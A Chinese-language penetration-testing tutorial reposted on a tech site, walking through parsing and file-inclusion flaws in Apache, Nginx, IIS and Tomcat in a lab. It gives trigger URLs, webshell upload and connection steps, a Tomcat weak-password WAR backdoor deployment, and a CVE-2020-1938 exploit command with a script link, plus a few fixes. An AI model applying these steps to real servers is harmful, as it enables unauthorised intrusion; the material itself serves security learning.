您当前的位置:首页 > 电脑百科 > 安全防护 > 网络安全

常见组件漏洞

时间:2020-09-11 10:35:35  来源:  作者:
常见组件漏洞

 

常⻅组件安全

常⻅组件

操作系统
 windowslinuxWeb 容器 ApacheTomcatNginx、IIS中间件 phpJAVAPython、perl数据库 MySQL、Oracle、SQL Server、Access、redis其他组件 phpStudy、Weblogic、JBoss开发框架 s2、thinkphp、vue

关注的问题

1. 组件与漏洞名称
2. 影响版本3. 漏洞的检测4. 漏洞的复现5. 漏洞的利⽤(漏洞场景、⼯具)6. 修复⽅案

 

Apache

Apache 解析漏洞

在1.x 和2.x 的版本中。

常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 

上传png图片:

常见组件漏洞

 

上传一句话木马:

yjh.php

常见组件漏洞

 


常见组件漏洞

 

上传失败!

常见组件漏洞

 

修改文件名:

常见组件漏洞

 


常见组件漏洞

 

上传成功!

常见组件漏洞

 

蚁剑连接:

http://192.168.10.128/upload/yjh.php.wenxin
常见组件漏洞

 


常见组件漏洞

 

getShell成功!

问题原因:

yjh.php.wenxin Apache 会当做PHP ⽂件来解析。
Apache 从右侧向左解析后缀名。
Apache/2.2.25 (Win32) mod_ssl/2.2.25 OpenSSL/0.9.8y PHP/5.2.17

Nginx

Nginx - 空字节漏洞

影响版本:

nginx 0.5.*
nginx 0.6.*
nginx 0.7 <= 0.7.65
nginx 0.8 <= 0.8.37

环境:

常见组件漏洞

 

运行nginx:

常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 

漏洞触发:

nginx version: nginx/0.7.65
http://192.168.10.128/info.png
http://http://192.168.10.128/info.png%00.php

 

常见组件漏洞

 

Nginx - 解析漏洞

解析图⽚⽊⻢

与PHP-CGI 有关 cgi.fix_pathinfo

启动漏洞环境

常见组件漏洞

 

 Docker-compose up -d

 

192.168.10.130

常见组件漏洞

 

制作图片木马:

常见组件漏洞

 


常见组件漏洞

 

上传:

常见组件漏洞

 

漏洞触发:

http://192.168.10.130/uploadfiles/6996efdd38b0767328bdfc1bbe7b932f.png/.php

 

常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 

nginx 版本

nginx/1.17.4

 

常见组件漏洞

 

Nginx - ⽂件路径解析漏洞 - CVE-2013-4547

影响版本

Nginx 0.8.41 ~ 1.4.3
Nginx 1.5.0 ~ 1.5.7

漏洞环境

登陆docker 环境

漏洞触发

# 上传图⽚⽊⻢
[1_yjh.jpg ] // .jpg后面有一个空格
http://192.168.16.100:8080/uploadfiles/1_yjh.png
http://192.168.16.100:8080/uploadfiles/1_yjh.png[0x20][0x00].php

 

常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 

其他:

常见组件漏洞

 

IIS

IIS 6.0 解析漏洞

漏洞环境

Windows 2003

// time.asp
<%=time()%>

 

常见组件漏洞

 

分号⽂件名截断

time.asp
time.asp;.jpghttp://10.10.10.233:8000/time.asp;.jpg

 

常见组件漏洞

 

*.asp ⽬录解析错误

time.jpg
/1.asp/time.jpg		//time.asp--->time.jpg
http://10.10.10.233:8000/1.asp/time.jpg

 

常见组件漏洞

 

time.jpg放在1.asp下被当做.asp来解析!

 

IIS 7.0/7.5 解析漏洞

漏洞环境

Windows 2008
IIS+PHP

漏洞的触发

http://192.168.16.193:8000/index.png
http://192.168.16.193:8000/index.png/.php

 

常见组件漏洞

 

漏洞防护

PHP-CGI
1. cgi.fix_pathinfo = 0
2. 处理映射程序|编辑模块映射|请求限制|映射|对勾

 

常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 

Tomcat

Tomcat 的安装与配置

直接解压

配置环境变量

C:Program FilesJavajdk1.8.0_131
JAVA_HOME:C:Program FilesJavajdk1.8.0_131
Path:%JAVA_HOME%bin;%JAVA_HOME%jrebin;

启动Tomcat:

C:apache-tomcat-8.5.32bin>startup.bat

 

常见组件漏洞

 

nmap 扫描端⼝

sudo nmap -A -p- 192.168.10.130

 

常见组件漏洞

 

开启Tomcat 管理控制台manager 远程访问

/webApps/manager/META-INF/context.xml

 

常见组件漏洞

 

配置管理控制台账密

/conf/tomcat-users.xml

 

常见组件漏洞

 

弱⼝令到GetShell

使⽤ tomcat/tomcat ,登录 Manager App 。

核⼼思路:通过管理控制台部署Web 应⽤,Web 应⽤就是后⻔!

将jsp ⽂件打包

jar cvf jshell.war jshell.jsp
http://192.168.16.193:8080/jshell/jshell.jsp

大马:jshell.jsp

常见组件漏洞

 

部署:

常见组件漏洞

 

大马密码:

常见组件漏洞

 


常见组件漏洞

 


常见组件漏洞

 

AJP LFI - CVE-2020-1938

2020年1⽉6⽇,国家信息安全漏洞共享平台(CNVD)收录了Apache Tomcat⽂件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)。攻击者利⽤该漏洞,可在未授权的情况下远程读取特定⽬录下的任意⽂件。

由于Tomcat 默认开启的AJP 服务(8009 端⼝)存在⼀处⽂件包含缺陷,攻击者可构造恶意的请求包进⾏⽂件包含操作,进⽽读取受影响Tomcat 服务器上的Web⽬录⽂件。

影响版本

tomcat 6
tomcat 7 < 7.0.100
tomcat 8 < 8.5.51
tomcat 9 < 9.0.31

漏洞利⽤

./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.16.193 -p 8009 -f WEBINF/web.xml

脚本下载地址:

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
常见组件漏洞

 


常见组件漏洞

 

创建hello.txt,并读取:

常见组件漏洞

 


常见组件漏洞

 

=== Well Done ===



Tags:漏洞   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips跟进漏洞产生原因的思路如何发现漏洞产生的原因...【详细内容】
2021-12-22  Tags: 漏洞  点击:(6)  评论:(0)  加入收藏
这几天Log4j的问题消息满天飞,今天我们就一起来看看从源码角度看看这个漏洞是如何产生的。 大家都知道这次问题主要是由于Log4j中提供的jndi的功能。具体涉及到的入口类是lo...【详细内容】
2021-12-15  Tags: 漏洞  点击:(13)  评论:(0)  加入收藏
一、SQL注入漏洞SQL 注入攻击( SQL Injection ),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串...【详细内容】
2021-12-10  Tags: 漏洞  点击:(23)  评论:(0)  加入收藏
央广网北京12月10日消息(总台央广记者管昕)近年来,互联网消费平台迅速崛起,让人足不出户就可坐享天下美食,买到物美价廉的物品。为了抢占市场,各大平台推出名目繁多的优惠券等消费...【详细内容】
2021-12-10  Tags: 漏洞  点击:(16)  评论:(0)  加入收藏
一、漏洞介绍如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可...【详细内容】
2021-09-23  Tags: 漏洞  点击:(73)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  Tags: 漏洞  点击:(65)  评论:(0)  加入收藏
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能...【详细内容】
2021-09-17  Tags: 漏洞  点击:(56)  评论:(0)  加入收藏
Apple 设备系统最近面临了许多安全性方面的考验,好在在研究组织 Citizen Lab 地帮忙揭露下,最近一个名为「ForcedEntry」的攻击漏洞,已经被官方确认并提出了建议,建议所有用户安...【详细内容】
2021-09-15  Tags: 漏洞  点击:(70)  评论:(0)  加入收藏
什么是Nessus?Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件步骤如下:查看当前kali系统内核版本...【详细内容】
2021-09-09  Tags: 漏洞  点击:(112)  评论:(0)  加入收藏
入侵一些网站,电脑,制作一些病毒,学会多项编程,这是一个普通黑客都会的技能,那么真正黑客能厉害到什么程度呢?除了勒索病毒,熊猫烧香等自动感染的病毒被大家熟知外,还有更厉害的骚操...【详细内容】
2021-08-19  Tags: 漏洞  点击:(66)  评论:(0)  加入收藏
▌简易百科推荐
(报告出品方:德勤)数字化转型网络安全及转型挑战在任何行业,保持竞争力都需要快速开发新产品和 服务并推向市场。创新型业务模式不仅仅是简单地将现有 流程数字化,其正在覆盖供应...【详细内容】
2021-12-22  认是    Tags:网络安全   点击:(19)  评论:(0)  加入收藏
10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。 网络安全中...【详细内容】
2021-12-07  实战Java  博客园  Tags:脚本攻击   点击:(18)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-12-01  Kali与编程    Tags:防火墙   点击:(30)  评论:(0)  加入收藏
网络安全服务商Randori公司日前发布了一份调查报告,列出了网络攻击者最有可能攻击或利用的IT资产。在遭遇Solarwinds黑客攻击一周年之际,以及在网络安全(尤其是勒索软件和供应...【详细内容】
2021-10-28  企业网D1net   企鹅号  Tags:网络攻击   点击:(57)  评论:(0)  加入收藏
0x01.背景实验利用Dns Administrators 组成员,通过远程配置Dns服务,进行Dll inject从而实现特权提升。 在域内,Dns server 通常为Dc Server,Dns服务器管理基于rpc,通过调用c:\wi...【详细内容】
2021-10-22  IT影子    Tags:特权提升   点击:(37)  评论:(0)  加入收藏
本文主要介绍和总结了CSRF跨站请求伪造的基本原理和主要防范措施,工作中有用到的朋友不妨收藏转发一下,以备您参考。什么是CSRF?CSRF跨站点请求伪造(Cross&mdash;Site Request...【详细内容】
2021-10-13  快乐中恒    Tags:CSRF   点击:(49)  评论:(0)  加入收藏
waf拦截在打某市 Hvv 第一天就找到一个文件上传的点,经过测试,可以直接任意文件上传,没有什么道理。 直接尝试上传 Php 文件,被 waf 拦截了 2021最新整理网络安全/渗透测试/安...【详细内容】
2021-10-11  KaliMa    Tags:防火墙   点击:(56)  评论:(0)  加入收藏
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能...【详细内容】
2021-09-17  IT野涵    Tags:漏洞链   点击:(56)  评论:(0)  加入收藏
您的苹果手机尽管iPhone比Android更安全,但也可以通过各种方式入侵。避免黑客入侵的最佳方法是警惕奇怪的链接或粗略的应用程序,并仅在必要时提供信息。电池寿命差和性能低下...【详细内容】
2021-09-16  Hackers爱好者    Tags:黑客入侵   点击:(631)  评论:(0)  加入收藏
防火墙一般布置在逻辑区域的入口处,位于三层网络架构的核心和汇聚之间,起到隔离逻辑区域,为逻辑区域创建安全策略的作用。 上面就是应用区的防火墙布置方式,他布置在应用区,可以...【详细内容】
2021-09-03  知来知去    Tags:主备模式防火墙   点击:(109)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条